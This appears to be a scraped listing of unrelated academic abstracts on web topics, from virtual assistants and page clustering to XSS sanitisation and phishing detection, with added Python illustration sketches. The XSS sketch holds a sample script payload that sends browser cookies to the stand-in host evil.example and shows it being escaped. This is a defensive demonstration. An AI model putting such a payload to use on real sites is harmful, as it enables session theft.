A Virtual Assistant for Websites

Author(s):  
José Luiz Andrade Duizith ◽  
Lizandro Kirst Da Silva ◽  
Daniel Ribeiro Brahm ◽  
Gustavo Tagliassuchi ◽  
Stanley Loh

This work presents a Virtual Assistant (VA) whose main goal is to supply information to Website users. The VA is a software system that interacts with people through a Web browser, receiving textual questions and answering them automatically without human intervention. The VA supplies information by looking for similar questions in a knowledge base and returning the corresponding answer. Artificial Intelligence techniques are employed in this matching process to compare the user’s question against the questions stored in the base. The main advantage of the VA is that it minimizes information overload when users get lost in Websites: it can guide the user across the web pages or supply information directly. This is especially important for customers visiting an enterprise site looking for products, services or prices, or needing information about some topic. The VA can also help in Knowledge Management processes inside enterprises, offering an easy way for people to store and retrieve knowledge. An extra advantage is a leaner Call Center structure, since the VA can be distributed to customers on a CD-ROM. Furthermore, the VA provides Webmasters with statistics about its usage (most-asked themes, number of visitors, conversation time).
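
The abstract does not specify the matching technique; a minimal sketch of one plausible approach, TF-IDF cosine similarity over the stored questions (the knowledge base and threshold here are hypothetical), might look like this:

```python
# Minimal sketch: match a user question to the most similar stored question
# via TF-IDF cosine similarity. The knowledge base below is hypothetical.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

knowledge_base = {
    "What are your opening hours?": "We are open 9am-6pm, Monday to Friday.",
    "How much does shipping cost?": "Shipping is free for orders over $50.",
    "How can I contact support?": "Email support@example.com or use the chat widget.",
}

questions = list(knowledge_base)
vectorizer = TfidfVectorizer()
question_vectors = vectorizer.fit_transform(questions)

def answer(user_question: str, threshold: float = 0.3) -> str:
    """Return the answer whose stored question is most similar, if any."""
    user_vec = vectorizer.transform([user_question])
    scores = cosine_similarity(user_vec, question_vectors)[0]
    best = scores.argmax()
    if scores[best] < threshold:  # no stored question is close enough
        return "Sorry, I could not find an answer to that."
    return knowledge_base[questions[best]]

print(answer("when do you open?"))
```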

2003 ◽  
Vol 9 (1) ◽  
pp. 17-22 ◽  
Author(s):  
E D Lemaire ◽  
G Greene

We produced continuing education material in physical rehabilitation using a variety of electronic media. We compared four methods of delivering the learning modules: in person with a computer projector, desktop videoconferencing, Web pages and CD-ROM. Health-care workers at eight community hospitals and two nursing homes were asked to participate in the project. A total of 394 questionnaires were received for all modalities: 73 for in-person sessions, 50 for desktop conferencing, 227 for Web pages and 44 for CD-ROM. This represents a 100% response rate from the in-person, desktop conferencing and CD-ROM groups; the response rate for the Web group is unknown, since the questionnaires were completed online. Almost all participants found the modules to be helpful in their work. The CD-ROM group gave significantly higher ratings than the Web page group, although all four learning modalities received high ratings. A combination of all four modalities would be required to provide the best possible learning opportunity.


2015 ◽  
Vol 21 (5) ◽  
pp. 661-664
Author(s):  
ZORNITSA KOZAREVA ◽  
VIVI NASTASE ◽  
RADA MIHALCEA

Graph structures naturally model connections. In natural language processing (NLP), connections are ubiquitous, at anything from the small scale to the web scale. We find them between words – as grammatical, collocation or semantic relations – contributing to the overall meaning and maintaining the cohesive structure of the text and the unity of the discourse. We find them between concepts in ontologies and other knowledge repositories – since the early days of artificial intelligence, associative and semantic networks have been proposed and used as knowledge stores, because they naturally capture the language units and the relations between them, and they allow for a variety of inference and reasoning processes, simulating some of the functionalities of the human mind. We find them between complete texts or web pages, and between entities in a social network, where they model relations at web scale. Beyond the more frequently encountered ‘regular’ graphs, hypergraphs have also appeared in our field, to model relations between more than two units.
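
As an illustration of the word-level case (not drawn from the article itself), a sketch that builds a simple co-occurrence graph over a toy sentence with networkx might look like this:

```python
# Minimal sketch: build a word co-occurrence graph from a toy text.
# Edges link words that appear within a sliding window of each other.
import networkx as nx

text = "graphs model connections between words and between concepts"
tokens = text.split()
window = 2  # hypothetical window size

G = nx.Graph()
for i, word in enumerate(tokens):
    for other in tokens[i + 1 : i + 1 + window]:
        if word != other:
            # increment the edge weight on repeated co-occurrence
            w = G.get_edge_data(word, other, default={"weight": 0})["weight"]
            G.add_edge(word, other, weight=w + 1)

# Degree centrality hints at which words hold the text together.
print(sorted(nx.degree_centrality(G).items(), key=lambda kv: -kv[1])[:3])
```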


Author(s):  
Ben Choi

Web mining aims at searching, organizing, and extracting information on the Web; search engines focus on searching. The next stage of Web mining is the organization of Web contents, which will then facilitate the extraction of useful information from the Web. This chapter focuses on organizing Web contents. Since the majority of Web contents are stored in the form of Web pages, the chapter concentrates on techniques for automatically organizing Web pages into categories. Various artificial intelligence techniques have been used; the most successful are classification and clustering, and this chapter focuses on clustering. Clustering is well suited for Web mining because it automatically organizes Web pages into categories, each of which contains Web pages with similar contents. One problem in clustering, however, is the lack of general methods for automatically determining the number of categories or clusters, and until now no such method has been suitable for Web page clustering. To address this problem, this chapter describes a method to discover a constant factor that characterizes the Web domain and proposes a new method for automatically determining the number of clusters in Web page datasets. The chapter also proposes a new bi-directional hierarchical clustering algorithm, which arranges individual Web pages into clusters, then arranges those clusters into larger clusters, and so on, until the average inter-cluster similarity approaches the constant factor. Together, the constant factor and the algorithm yield a new clustering system suitable for mining the Web.
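
The chapter's constant factor and bi-directional algorithm are not reproduced here; a minimal sketch of the general idea, agglomerative merging that stops once the average inter-cluster similarity falls to an assumed constant, could look like the following (the documents, the constant, and the average-link scoring are all illustrative assumptions):

```python
# Minimal sketch: agglomerative clustering of pages that stops when the
# average inter-cluster similarity drops to an assumed domain constant.
from itertools import combinations
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

pages = [  # hypothetical page texts
    "cheap flights and hotel deals",
    "book flights online with discounts",
    "python tutorial for beginners",
    "learn python programming step by step",
]
CONSTANT = 0.05  # illustrative stand-in for the chapter's constant factor

sim = cosine_similarity(TfidfVectorizer().fit_transform(pages))
clusters = [[i] for i in range(len(pages))]

def cluster_sim(a, b):
    """Average pairwise similarity between the members of two clusters."""
    return sum(sim[i][j] for i in a for j in b) / (len(a) * len(b))

while len(clusters) > 1:
    pairs = list(combinations(range(len(clusters)), 2))
    avg = sum(cluster_sim(clusters[i], clusters[j]) for i, j in pairs) / len(pairs)
    if avg <= CONSTANT:  # remaining clusters are dissimilar enough: stop
        break
    i, j = max(pairs, key=lambda p: cluster_sim(clusters[p[0]], clusters[p[1]]))
    clusters[i] += clusters.pop(j)  # j > i, so index i stays valid

print(clusters)  # e.g. [[0, 1], [2, 3]] under these assumptions
```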


2012 ◽  
Vol 28 (2) ◽  
pp. 176-184 ◽  
Author(s):  
Alfred Loo

The Internet is an effective learning tool for gifted children because it allows them to independently select the areas in which they have talent. The Internet also enables children to discover and maximize their potential. However, younger children might not have a large enough vocabulary to surf the Internet, even if they are gifted; for example, creatively gifted children might not have exceptional reading ability. To solve this problem, a special web browser was used that generates human speech from the words appearing on the displayed web pages. Experiments involving about 100 kindergarteners were conducted to assess the effectiveness of our approach. This paper demonstrates the feasibility of the web browser in enabling kindergarten children aged 3–6 years to surf the Internet.
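
The paper's browser itself is not described beyond the abstract; a minimal sketch of the underlying idea, reading a page's visible text aloud with an off-the-shelf text-to-speech engine (requests, BeautifulSoup, and pyttsx3 are assumed substitutes, not the authors' tools), might be:

```python
# Minimal sketch: fetch a page and speak its visible text aloud.
# requests/BeautifulSoup/pyttsx3 stand in for the paper's custom browser.
import requests
from bs4 import BeautifulSoup
import pyttsx3

def speak_page(url: str) -> None:
    html = requests.get(url, timeout=10).text
    soup = BeautifulSoup(html, "html.parser")
    for tag in soup(["script", "style"]):  # drop non-visible content
        tag.decompose()
    text = " ".join(soup.get_text().split())
    engine = pyttsx3.init()
    engine.say(text[:500])  # speak only the first part as a demo
    engine.runAndWait()

speak_page("https://example.com")
```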


2018 ◽  
Vol 8 (4) ◽  
pp. 1-13
Author(s):  
Rajnikant Bhagwan Wagh ◽  
Jayantrao Bhaurao Patil

Recommendation systems are growing very rapidly. While surfing, users frequently miss the goal of their search and get lost in information overload. To overcome this problem, the authors propose a novel web page recommendation system that saves users' surfing time. Users are analyzed as they surf a particular web site. The authors use a relationship matrix and a frequency matrix to effectively find the connectivity among the web pages of similar users. These web pages are divided into clusters using an enhanced graph-based partitioning concept, and active users are then classified more accurately against the discovered clusters. Threshold values are used in both the clustering and classification stages for more appropriate results. Experimental results show accuracy of around 61%, coverage of 37% and an F1 measure of 46%, which helps improve users' surfing experience.
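
The paper's matrices and enhanced partitioning are not detailed in the abstract; a minimal sketch of the general pipeline, a page co-visit frequency matrix thresholded into a graph whose connected components serve as clusters (the sessions and threshold are hypothetical), might be:

```python
# Minimal sketch: build a page co-visit frequency matrix from user sessions,
# threshold it into a graph, and take connected components as page clusters.
from collections import Counter
from itertools import combinations
import networkx as nx

sessions = [  # hypothetical browsing sessions (pages per user visit)
    ["home", "products", "pricing"],
    ["home", "products", "cart"],
    ["blog", "about"],
    ["blog", "about", "contact"],
]
THRESHOLD = 2  # min co-visits for an edge; an illustrative value

freq = Counter()
for session in sessions:
    for a, b in combinations(sorted(set(session)), 2):
        freq[(a, b)] += 1

G = nx.Graph()
for (a, b), count in freq.items():
    if count >= THRESHOLD:
        G.add_edge(a, b, weight=count)

clusters = [sorted(c) for c in nx.connected_components(G)]
print(clusters)  # e.g. [['home', 'products'], ['about', 'blog']]
```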


Author(s):  
Juan Manuel Adan-Coello ◽  
Carlos Miguel Tobar ◽  
João Luís Garcia Rosa ◽  
Ricardo Luís de Freitas

The objective of this chapter is to discuss relevant applications of Semantic Web technologies in the field of education, emphasizing experiences that point out trends and paths that can make the educational Semantic Web a reality. Through metadata, the Semantic Web makes it possible for resources of every type to be located, retrieved and processed without human intervention, helping to reduce the information overload of the current Web. The possibility of describing resources with metadata that computers can process simplifies the creation of self-organizing networks of learners, information, authors, teachers, and educational institutions. The adoption of Semantic Web technologies in the e-learning field contributes to the construction of flexible and intelligent educational systems, allowing reuse, integration, and interoperation of educational and non-educational resources (content and services) distributed over the Web.
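
As a concrete illustration (not taken from the chapter), describing a learning resource with machine-processable metadata, here with rdflib and Dublin Core terms, could look like this:

```python
# Minimal sketch: describe a learning resource with Dublin Core metadata
# so that software agents can locate and process it without human help.
from rdflib import Graph, Literal, URIRef
from rdflib.namespace import DC, RDF, FOAF

g = Graph()
course = URIRef("http://example.org/courses/semantic-web-101")  # hypothetical

g.add((course, RDF.type, FOAF.Document))
g.add((course, DC.title, Literal("Introduction to the Semantic Web")))
g.add((course, DC.creator, Literal("Example University")))
g.add((course, DC.language, Literal("en")))
g.add((course, DC.subject, Literal("e-learning")))

print(g.serialize(format="turtle"))
```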


Author(s):  
Shashank Gupta ◽  
B. B. Gupta

A Cross-Site Scripting (XSS) attack exploits a client-side browser vulnerability caused by the improper sanitization of user input embedded in Web pages. Researchers have proposed various defensive strategies, vulnerability scanners, and so on, but XSS flaws remain in Web applications due to inadequate understanding and implementation of these defensive tools and strategies. Therefore, in this chapter, the authors propose a security model called Browser Dependent XSS Sanitizer (BDS), deployed on the client-side Web browser, for eliminating the effect of XSS vulnerabilities. Earlier client-side solutions degrade the performance of the Web browser; here, the authors use a three-step approach that blocks XSS attacks without degrading much of the user's Web browsing experience. In the authors' experiments, the approach proved capable of preventing XSS attacks on various modern Web browsers.
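
The BDS model itself is not reproduced in the abstract; as a minimal illustration of the root cause, improper sanitization, the sketch below escapes user input before it is embedded in a page (Python's html.escape stands in for a real sanitizer; this is not the authors' three-step approach):

```python
# Minimal sketch: escape user input before embedding it in HTML so that
# injected script tags render as inert text instead of executing.
import html

def render_comment(user_input: str) -> str:
    """Embed user input in a page fragment after escaping it."""
    safe = html.escape(user_input, quote=True)
    return f"<div class='comment'>{safe}</div>"

malicious = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
print(render_comment(malicious))
# -> the <script> tag is emitted as &lt;script&gt;... and never runs
```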


Phishing attacks are used for identity theft with the help of social engineering and other sophisticated techniques: the user is lured into clicking a URL and is trapped on a phishing Web page. Securing users' credentials is one of the most important concerns for organizations today; it can be pursued in several ways, such as education and training, which raise the level of awareness and help to mitigate phishing. This paper introduces an approach consisting of several steps, precautionary measures a user should take when browsing in any Web browser. We found it possible to detect phishing Web pages without anti-phishing solutions. The approach comprises several steps that examine whether a Web page is genuine or fake, each checking whether phishing features exist in the page. To evaluate our approach, we analyzed the PhishTank data set, which consists of phishing Web pages. The purpose of the evaluation was to check the features discussed in our approach for making the user aware. The results show that users can detect phishing without any anti-phishing solution, simply by taking some steps to check the Web page for certain features.
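
The paper's exact checklist is not given in the abstract; a minimal sketch of typical URL-level phishing features a user or script might check (the specific rules are common heuristics, assumed rather than taken from the paper) could be:

```python
# Minimal sketch: flag common URL-level phishing features. These rules are
# widely used heuristics and only illustrate the idea of a feature checklist.
import re
from urllib.parse import urlparse

def phishing_features(url: str) -> dict:
    host = urlparse(url).netloc
    return {
        "ip_address_host": bool(re.fullmatch(r"[\d.]+", host)),  # raw IP, no domain
        "has_at_symbol": "@" in url,          # '@' hides the real destination
        "very_long_url": len(url) > 75,       # long URLs obscure the host
        "many_subdomains": host.count(".") > 3,
        "no_https": not url.startswith("https://"),
    }

suspect = "http://192.168.10.5/paypal.com/login@verify"
for feature, flagged in phishing_features(suspect).items():
    print(f"{feature}: {flagged}")
```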


2016 ◽  
Vol 4 (8) ◽  
pp. 118-135
Author(s):  
Rajendra Gupta

Phishing is a kind of e-commerce lure that tries to steal the confidential information of web users by creating a website identical to the legitimate one, in which the contents and images remain almost the same as on the legitimate website, with only small changes. Another form of phishing makes minor changes to the URL or domain of the legitimate website. In this paper, a number of anti-phishing toolbars are discussed, and a system model for tackling phishing attacks is proposed. The proposed anti-phishing system is based on a plug-in tool for the web browser. The performance of the proposed system is studied with three data mining classification algorithms: Random Forest, Nearest Neighbour Classification (NNC), and the Bayesian Classifier (BC). To evaluate the proposed anti-phishing system for the detection of phishing websites, 7690 legitimate websites and 2280 phishing websites were collected from authorized sources such as the APWG database and PhishTank. After analyzing the data mining algorithms over the phishing web pages, it is found that the Bayesian algorithm responds fastest and gives more accurate results than the other algorithms.
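
The paper's features and dataset are not reproduced here; a minimal sketch of the comparison itself, training the same three classifier families on a labeled feature matrix with scikit-learn (the toy features and labels are hypothetical), might look like this:

```python
# Minimal sketch: compare Random Forest, nearest-neighbour and naive Bayes
# classifiers on a toy phishing feature matrix (features/labels hypothetical).
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import cross_val_score
import numpy as np

rng = np.random.default_rng(0)
# Each row: [url_length, num_dots, has_at_symbol, uses_https]
X = rng.random((200, 4))
y = rng.integers(0, 2, 200)  # 1 = phishing, 0 = legitimate (random stand-in)

models = {
    "Random Forest": RandomForestClassifier(n_estimators=100, random_state=0),
    "Nearest Neighbour": KNeighborsClassifier(n_neighbors=5),
    "Bayesian (GaussianNB)": GaussianNB(),
}
for name, model in models.items():
    scores = cross_val_score(model, X, y, cv=5)
    print(f"{name}: mean accuracy {scores.mean():.3f}")
```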

